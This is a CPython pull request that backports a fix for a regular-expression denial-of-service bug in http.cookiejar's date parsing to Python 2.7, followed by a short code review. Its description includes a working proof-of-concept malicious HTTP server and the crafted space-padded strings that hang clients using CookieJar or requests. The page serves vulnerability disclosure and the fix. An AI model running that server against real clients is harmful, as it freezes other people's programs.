[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

vstinner · 2019-11-22T14:36:25Z

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage, blocking execution for a long time.

The regex contained multiple overlapping \s* terms.
Ignoring the ?-optional groups, the regex could be simplified to

\d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.
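
As a rough illustration of the ambiguity described above, the sketch below times the simplified pattern quoted earlier against a rewrite in which a single \s* owns every trailing space. Both patterns are stand-ins chosen for illustration, not the real LOOSE_HTTP_DATE_RE or the exact regex from this patch, and the helper name time_match is hypothetical.

```python
import re
import time

# Simplified stand-ins, NOT the real LOOSE_HTTP_DATE_RE.
# AMBIGUOUS is the reduced pattern quoted in the description.
# UNAMBIGUOUS is a hypothetical rewrite where one \s* owns all trailing spaces.
AMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*\s*\s*)$")
UNAMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*)$")


def time_match(pattern, text):
    """Return (match result, elapsed seconds) for one pattern.match call."""
    start = time.perf_counter()
    result = pattern.match(text)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    # Small sizes on purpose: the ambiguous pattern slows down quickly.
    for n_spaces in (50, 100, 200):
        text = "1-c-1" + " " * n_spaces + "!"
        _, slow = time_match(AMBIGUOUS, text)
        _, fast = time_match(UNAMBIGUOUS, text)
        print(f"{n_spaces:>4} spaces: ambiguous {slow:.4f}s, "
              f"unambiguous {fast:.4f}s")
```

Both patterns reject the malicious string and accept a date followed only by spaces. The difference is in how many ways the engine can divide the spaces among the \s* terms before giving up, so the ambiguous timings should grow much faster as n_spaces increases.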

You can create a malicious server which responds with Set-Cookie headers
to attack any Python program that accesses it, e.g.:

from http.server import BaseHTTPRequestHandler, HTTPServer

def make_set_cookie_value(n_spaces):
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(204)
        self.send_response_only(204)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65506  # Max header line length 65536
        )
        value = make_set_cookie_value(n_spaces)
        for i in range(99):  # Not necessary, but we can have up to 100 header lines
            self.send_header("Set-Cookie", value)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers, each containing 65506 spaces.
Extracting the cookies will effectively never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

import requests
requests.get("http://localhost:44020/")

Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.
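
A regression check along these lines might look like the sketch below. It is not the test added by this PR: the class name, the 2000-space input, and the 5-second budget are assumptions made for illustration. It uses the Python 3 module path; on the 2.7 branch the equivalent function lives in cookielib. On an interpreter without the fix, the call may run for a very long time instead of failing cleanly.

```python
import time
import unittest
from http.cookiejar import http2time


class LooseHttpDateRedosTest(unittest.TestCase):
    """Hypothetical regression check; not the test added by this PR."""

    # Assumed budget: generous for a linear-time match, far too short
    # for catastrophic backtracking on this input.
    BUDGET_SECONDS = 5.0

    def test_long_run_of_spaces_is_rejected_quickly(self):
        # Same shape as the malicious Expires value in the description.
        bad = "1-c-1" + " " * 2000 + "!"
        start = time.perf_counter()
        result = http2time(bad)
        elapsed = time.perf_counter() - start
        # The string is not a valid date, so parsing must return None.
        self.assertIsNone(result)
        self.assertLess(elapsed, self.BUDGET_SECONDS)


if __name__ == "__main__":
    unittest.main()
```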

Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
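
The ISO date path can be exercised in the same spirit through iso2time, the module-level function in http.cookiejar that applies ISO_DATE_RE. The sketch below is only a quick check, assuming a Python 3 interpreter; the helper name is hypothetical, and the valid sample date is taken from the formats listed in the function's own docstring.

```python
from http.cookiejar import iso2time


def padded_iso_date_is_rejected(n_spaces):
    """Return True if the space-padded string from the description is rejected."""
    text = "444444" + " " * n_spaces + "A"
    return iso2time(text) is None


if __name__ == "__main__":
    # The padded string is not a valid date, so it should be rejected.
    print(padded_iso_date_is_rejected(2000))
    # A well-formed ISO 8601 date should still parse to a timestamp.
    print(iso2time("1994-02-03 14:15:29 -0100") is not None)
```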

(cherry picked from commit 1b779bf)

https://bugs.python.org/issue38804

vstinner · 2019-11-22T14:37:23Z

@bcaller @serhiy-storchaka: Would you mind carefully reviewing this backport to Python 2.7? I had to fix multiple conflicts during the backport.

bcaller

LGTM.

bcaller · 2019-11-22T17:12:42Z

Lib/cookielib.py

@@ -266,7 +270,7 @@ def http2time(text):
    return _str2time(day, mon, yr, hr, min, sec, tz)

 ISO_DATE_RE = re.compile(
-    """^
+    r"""^


Is there a reason that this r prefix is needed specifically for Python 2? I suppose it is preferred, but the regex is the same either way (str(sre_parse.parse("""^... gives the same result with and without it).
Unrelated to this change, I just noticed that the backslash in [-\/] doesn't do anything. Not sure why it's there.
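
For what it's worth, the remark about the backslash can be checked directly. The snippet below is a small sketch, with the helper name accepted made up for illustration, comparing which single characters each character class matches.

```python
import re
import string

# The class as written in the module, and the same class without the backslash.
ESCAPED = re.compile(r"[-\/]")
PLAIN = re.compile(r"[-/]")


def accepted(pattern):
    """Return the set of printable ASCII characters the pattern fully matches."""
    return {ch for ch in string.printable if pattern.fullmatch(ch)}


if __name__ == "__main__":
    print(sorted(accepted(ESCAPED)))
    print(accepted(ESCAPED) == accepted(PLAIN))
```

Inside a character class, a backslash before "/" just yields a literal "/", so both classes accept only "-" and "/".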

Oh, I see: the r wasn't in the Python 2 branch.

So... adding the r is correct, right?

Yes. Ignore me.

vstinner added the type-security A security issue label Nov 22, 2019

the-knights-who-say-ni added the CLA signed label Nov 22, 2019

bedevere-bot added the awaiting core review label Nov 22, 2019

bcaller approved these changes Nov 22, 2019

vstinner merged commit e649903 into python:2.7 Nov 24, 2019

vstinner deleted the cookiejar_regex27 branch November 24, 2019 15:49

bedevere-bot removed the awaiting core review label Nov 24, 2019
